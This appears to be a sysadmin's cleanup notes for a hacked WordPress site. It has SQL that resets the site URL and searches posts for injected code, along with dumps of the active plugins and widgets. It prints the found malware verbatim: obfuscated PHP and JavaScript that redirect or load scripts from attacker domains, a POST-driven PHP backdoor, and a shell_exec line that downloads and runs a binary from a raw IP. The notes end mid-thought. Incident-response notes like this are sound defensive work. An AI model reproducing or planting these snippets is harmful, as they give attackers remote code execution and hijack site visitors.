Change the "siteurl" and "home" values in the 'options' table:
<aside> 💡 Use Search & Replace for Wordpress
</aside>
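-- Reset the two address options ('siteurl' and 'home') to the legitimate URL.
-- The value must be the bare URL. The original note had it wrapped in angle
-- brackets (<...>), which is link markup from the export and would have been
-- stored literally in option_value.
-- Record the current option_value of both rows before overwriting them: an
-- injected redirect target is evidence worth keeping.
-- Replace https://mydomain.com with the real address and mod538_ with the
-- table prefix of the affected install.
UPDATE `mod538_options`
SET `option_value` = 'https://mydomain.com'
WHERE `option_name` = 'siteurl';

UPDATE `mod538_options`
SET `option_value` = 'https://mydomain.com'
WHERE `option_name` = 'home';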
-- List posts whose body contains an iframe, a noscript element or an inline
-- 'display:' style. A single pass with OR-ed filters returns each matching
-- post once, the same rows as the three-way UNION (assuming the posts table
-- has its usual primary key, so no two rows are identical).
-- Hits are candidates to review, not confirmed injections: 'display:' also
-- appears in ordinary inline CSS. These patterns do not match a plain
-- <script> tag, so search for that separately.
SELECT *
FROM mod538_posts
WHERE post_content LIKE '%<iframe%'
   OR post_content LIKE '%<noscript%'
   OR post_content LIKE '%display:%';
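Search all tables for strings like the one below (the angle brackets around the URL are link markup added by the export, not part of the injected tag):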
# Create a regex for the query parameter 'n' (a-z1-9)
# /^[a-z]+\\.js\\?[a-z]+=\\w{3,}$/
<script src='<https://irc.lovegreenpencils.ga/stat.js?n=ns1>' type='text/javascript'></script>
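Delete these pieces of code from files, searching from the root folder (e.g. /var/www). Note that the third one is a backdoor that runs PHP code sent in a POST request, so deleting the snippets does not by itself close the attacker's access: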
<?php $a="h"."ea"."der";$a(chr(76).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(105).chr(114).chr(99).chr(46).chr(108).chr(111).chr(118).chr(101).chr(103).chr(114).chr(101).chr(101).chr(110).chr(112).chr(101).chr(110).chr(99).chr(105).chr(108).chr(115).chr(46).chr(103).chr(97).chr(47).chr(114).chr(121).chr(101).chr(114).chr(121).chr(63).chr(105).chr(100).chr(61).chr(53).chr(56).chr(52).chr(38).chr(114).chr(115).chr(61).chr(50));?>
<script type="text/javascript" src="'.chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(109).chr(97).chr(105).chr(110).chr(46).chr(116).chr(114).chr(97).chr(118).chr(101).chr(108).chr(102).chr(111).chr(114).chr(110).chr(97).chr(109).chr(101).chr(119).chr(97).chr(108).chr(107).chr(105).chr(110).chr(103).chr(46).chr(103).chr(97).chr(47).chr(100).chr(101).chr(116).chr(46).chr(112).chr(104).chr(112).chr(63).chr(118).chr(61).chr(53).'"></script>
<?php error_reporting(0);ini_set('display_errors', 0); if(isset($_POST['m']) && md5($_POST['m']) == "8b83a84918c63d1e9b9ab82e07e20539" ) {$a = base64_decode($_POST['a']);file_put_contents('_a','<?php '.$a);$a='_a';if(file_exists($a)){include($a);unlink($a);}} ?><script type='text/javascript' src='<https://main.travelfornamewalking.ga/m.js?w=085>'></script>
I guess the attack was made on all-in-one-wp-security-and-firewall
Found _a file at the plugin's root:
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,105,114,99,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
<?php $a = 'ulimit -n 234234;cd /tmp;mkdir ktsyrtrtt3;chmod 777 ktsyrtrtt3;cd ktsyrtrtt3;rm -f ktsyrtrtt3;wget -O ktsyrtrtt3 <http://95.181.172.55/8658/ktsyrtrtt;chmod> 777 ktsyrtrtt3;nohup "./ktsyrtrtt3" >> /dev/null 2>&1 & echo $!';shell_exec($a);
-- Fetch the options row that holds the active plugin list; its option_value
-- is a PHP-serialized array of plugin entry files.
SELECT *
FROM `mod538_options`
WHERE `option_name` = 'active_plugins';
Plugins activated in wp_options:
a:23:{i:1;s:53:"amr-shortcode-any-widget/amr-shortcode-any-widget.php";i:2;s:45:"astoundify-favorites/astoundify-favorites.php";i:3;s:35:"cookie-law-info/cookie-law-info.php";i:4;s:50:"google-analytics-for-wordpress/googleanalytics.php";i:5;s:19:"if-menu/if-menu.php";i:6;s:37:"mailchimp-for-wp/mailchimp-for-wp.php";i:7;s:39:"mailchimp-top-bar/mailchimp-top-bar.php";i:8;s:27:"ninja-forms/ninja-forms.php";i:9;s:45:"olympus-google-fonts/olympus-google-fonts.php";i:10;s:27:"popup-maker/popup-maker.php";i:11;s:47:"really-simple-ssl/rlrsssl-really-simple-ssl.php";i:12;s:27:"redirection/redirection.php";i:13;s:39:"super-progressive-web-apps/superpwa.php";i:14;s:37:"syntax-highlight/syntax-highlight.php";i:15;s:35:"ultimate-member/ultimate-member.php";i:16;s:27:"updraftplus/updraftplus.php";i:17;s:27:"woocommerce/woocommerce.php";i:18;s:24:"wordpress-seo/wp-seo.php";i:19;s:65:"wp-job-manager-contact-listing/wp-job-manager-contact-listing.php";i:20;s:63:"wp-job-manager-listing-labels/wp-job-manager-listing-labels.php";i:21;s:53:"wp-job-manager-locations/wp-job-manager-locations.php";i:22;s:33:"wp-job-manager/wp-job-manager.php";i:23;s:71:"yikes-inc-easy-mailchimp-extender/yikes-inc-easy-mailchimp-extender.php";}
-- Fetch the options row that holds the widget placement; its option_value is
-- a PHP-serialized array mapping each widget area to its widget ids.
SELECT *
FROM `mod538_options`
WHERE `option_name` = 'sidebars_widgets';
Widgets activated in wp_options:
a:14:{s:19:"wp_inactive_widgets";a:17:{i:0;s:10:"archives-2";i:1;s:6:"meta-2";i:2;s:8:"search-2";i:3;s:12:"categories-2";i:4;s:12:"categories-4";i:5;s:14:"recent-posts-2";i:6;s:17:"recent-comments-2";i:7;s:11:"tag_cloud-3";i:8;s:10:"nav_menu-6";i:9;s:32:"woocommerce_product_categories-3";i:10;s:32:"listify_widget_author_listings-3";i:11;s:32:"listify_widget_author_listings-4";i:12;s:35:"listify_widget_panel_listing_tags-2";i:13;s:38:"listify_widget_panel_listing_content-2";i:14;s:39:"listify_widget_panel_listing_comments-2";i:15;s:38:"listify_widget_panel_listing_gallery-2";i:16;s:34:"listify_widget_panel_listing_map-2";}s:21:"widget-area-sidebar-1";a:3:{i:0;s:8:"search-4";i:1;s:6:"text-3";i:2;s:14:"recent-posts-4";}s:16:"widget-area-home";a:6:{i:0;s:32:"listify_widget_recent_listings-1";i:1;s:36:"listify_widget_taxonomy_image_grid-1";i:2;s:25:"listify_widget_features-1";i:3;s:32:"listify_widget_feature_callout-1";i:4;s:29:"listify_widget_recent_posts-4";i:5;s:24:"listify_call_to_action-1";}s:20:"widget-area-footer-1";a:1:{i:0;s:6:"text-1";}s:20:"widget-area-footer-2";a:1:{i:0;s:6:"text-7";}s:20:"widget-area-footer-3";a:0:{}s:23:"widget-area-author-main";a:0:{}s:26:"widget-area-author-sidebar";a:0:{}s:27:"widget-area-sidebar-product";a:0:{}s:24:"widget-area-sidebar-shop";a:0:{}s:19:"archive-job_listing";a:0:{}s:30:"single-job_listing-widget-area";a:5:{i:0;s:38:"listify_widget_panel_listing_content-1";i:1;s:35:"listify_widget_panel_listing_tags-4";i:2;s:36:"listify_widget_panel_listing_video-1";i:3;s:39:"listify_widget_panel_listing_comments-1";i:4;s:36:"listify_widget_panel_listing_video-2";}s:18:"single-job_listing";a:4:{i:0;s:34:"listify_widget_panel_listing_map-1";i:1;s:46:"listify_widget_panel_listing_social_profiles-1";i:2;s:38:"listify_widget_panel_listing_gallery-1";i:3;s:46:"listify_widget_panel_listing_social_profiles-2";}s:13:"array_version";i:3;}
Create a Node.js script with a dictionary. Source: